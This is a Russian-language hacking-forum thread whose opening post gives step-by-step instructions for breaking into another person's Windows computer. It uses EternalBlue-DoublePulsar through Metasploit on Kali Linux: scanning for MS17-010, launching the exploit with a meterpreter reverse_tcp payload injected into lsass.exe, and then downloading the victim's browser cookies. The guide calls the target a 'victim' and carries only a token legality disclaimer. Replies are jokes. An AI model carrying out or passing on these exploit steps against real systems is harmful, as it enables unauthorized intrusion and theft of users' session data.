Загрузка...

Взлом компьютера на растоянии

Тема в разделе Социальная инженерия создана пользователем Ilusdsf 18 фев 2019. 459 просмотров

1. Ilusdsf
    Ilusdsf Автор темы 18 фев 2019 132 22 окт 2018
    Сегодня я постараюсь вам доступным языком обьяснить и пошагово дать инструкцию, как всё же использовать данный эксплоит в своих целях.

upd: Я никого не побуждаю к действиям. Всё это противозоконно, если вы делайте это в своихкорыстных целях

На сегодняшний день я не очень то и много нашёл информации по поводу подробной установки Kali linux на ваше устройтво и установку Eternalblue-Doublepulsar(у меня флешка, если вы ставите её на основной жёсткий диск, то ёбли с флешкой вы сможете избежать) Этот способ не 100%-ый т.к. работает на уязвимости порта 445. Я уже писал статью, но сейчас будет подробная пошагавая инструкция исходя из моих опытов. Если у вас вылезла ошибка, я постараюсь ответить и помочь вам.

Итак приступим.

Нам потребуется: Прямые руки + Интернет (желательно быстрый)

С самого начала скачиваем iso файл Kali linux с офф. сайта

После мы открываем Rufus и выбираем устройство, после во второй строке выбираем "MBR для компьютеров с UEFI" - Ставим мы его потому что некоторые версии BIOS не видят флешки с "MBR для компьютеров с BIOS или UEFI". Сам сталкивался с такой проблемой.

Потом жмём на дисковод рядом с строкой "FreeDOS" и выбираем путь до нашего Kali Linux.iso

Соглашаемся с тем, что мы потеряем все данные на флешке и начнётся установка.

После у нас есть уже сам Kali linux на флешке! Но! Что бы сохранять файлы на нём нужно сделать ещё один раздел под названием persistence и с файловой системой Ext4. Можно сделать это как и в линуксе, так и с виндой. Мой выбор пал на программу MiniTool Partition Wizard

Скачиваем бесплатную версию и в меню выбираем MiniTool Partition Wizard FreeПосле разделяем флешку на 2 части, на одной у нас будет система, на другой будут храниться файлы, которые были скачаны на Kali linux'е.Создаём раздел persistence с файловой системой Ext4 и ждём.И так. Загружаемся с биоса и выбираем флешку. И в загрузочном меню сначала выбирайте версию Live.После загрузки вас поприветствует приятный интерфейс Kali linux. Но, нам нужно прописать пару команд, без которых у нас ничего сохраняться не будет.Код:
    fdisk -l

Мы смотрим под каким названием у нас находится раздел persistenceПосле как мы найдём его пишем следующее... (У меня лично пишет /dev/sdb2, у вас скорее всего будет по другому)Код:
    mkdir -p /mnt/sdb2
    mount /dev/sdb2 /mnt/sdb2
    echo "/ union" > /mnt/sdb2/persistence.conf
    umount /dev/sdb2
    reboot

И после перезагрузки мы выбираем тертью строку с persistence.Хорошо, теперь у нас есть флешка с Kali linux, которая сохраняет все файлы. Далее нам нужно установить wine для работы с EternalBlue-Doublepulsar.Пишем в консолиКод:
    wine

И он нам пишетКод:
    it looks like multiarch needs to be enabled. as root, please execute "dpkg --add-architecture i386 && apt-get update && apt-get install wine32"
    Usage: wine PROGRAM.... и т.д.

Из вышесказанного сообщения нам нужно прописать в консольКод:
    dpkg --add-architecture i386 && apt-get update && apt-get install wine32

Лично у меня 16гб флешка и с 4мб/сек устанавливалось всё это добро около 2-х или трёх часов. Но того стоило (флешка старая, у вас должно быть быстрее)После установки компонентов пишем снова в консольКод:
    wine

После он не должен писать насчёт установки wine32.Хорошо, дальше нам нужно установить сам EternalBlue-DoublePulsar ПишемКод:
    git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

и ждём установки файлов.Далее нам нужно закинуть это в путь /root/.msf4/modules/exploits/windows/smb/ Для открытия скрытых файлов в Linux просто нажмите комбинацию клавиш ctrl + h. Если у вас нету папки .msf4 то пропишите в консольКод:
    msfconsole

И если у вас нет данных папок /exploits/windows/smb/, то создайте их вручную и СКОПИРУЙТЕ! туда следующие файлы (eternalblue_doublepulsar.rb, deps)После открываем сноваКод:
    msfconsole

и ждём загрузки.После выполняем ряд следующих комманд, и да, нам нужно узнать ip адресс жертвы, я лично использовал на Linux ifconfig, а для жертвы на телефоне прилождение Fing.Для примера возьмём наш ip => 192.168.0.3А для жертвы придумаем => 192.168.0.8ПоехалиКод:
    msfconsole
    use auxiliary/scanner/smb/smb_ms17_010
    set rhosts 192.168.0.108
    run
    (Тут он пишет, что всё ок)
    use exploit/windows/smb/eternalblue-doublepulsar
    set rhost 192.168.0.108
    set lhost 192.168.0.103
    set targetarchitecture x64(x86)
    set windows/x64/meterpreter/reverse_tcp
    set processinject lsass.exe
    run

Ах да, чуть не забыл, у вас изначально не будет директорииКод:
    mkdir -p /root/.wine/drive_c

- вы должны создать её самостоятельно написав следующееВсё! У вас появится доступ к чужому компьютеру (Тестировалось на операционной системе Windows 7 x64 ultimate)Вот некоторые команды meterpreter для использования:Download - загружает с удалённого компьютера на ваш файлы, например вам нужно скачать куки браузера, что бы потом уже использовать их, тогд вы пишетеКод:
    downlaod c:/users/...... (место хранения куки и сам файл куки или папку, где есть этот файл)

Команда "help", как и может ожидаться, отображает меню помощи "Meterpreter".Команда ‘background‘ переводит текущую сессию Meterpreter в фоновый режим, и мы возвращаемся в командную строку "msf". Для того чтобы вернуться в сессии Meterpreter, просто необходимо обратится к ней снова.Команда "edit" открывает файл, расположенный на целевом хосте. Он использует "vim" и все доступные команды данного редактора.Команда "execute" запускает команду на целевом компьютере.Остальной список базовых команд вы сможете найти на сайте http://www.stanovlenie.org.ua/meterpreter-basic-commands/

Этот материал оказался полезным?
    Вы можете отблагодарить автора темы путем перевода средств на баланс
    Отблагодарить автора
  2. Evgenius
    Evgenius 18 фев 2019 Мастер спорта в рукопашном сексе
    нихуя ты киберомлет

3. DaniilDream
    DaniilDream 16 мар 2019 19 21 мар 2018
    теперь я хакер:spain:

4. razerqwerty1337
    razerqwerty1337 16 мар 2019 Заблокирован(а) 32 14 мар 2019
    Пентагон держись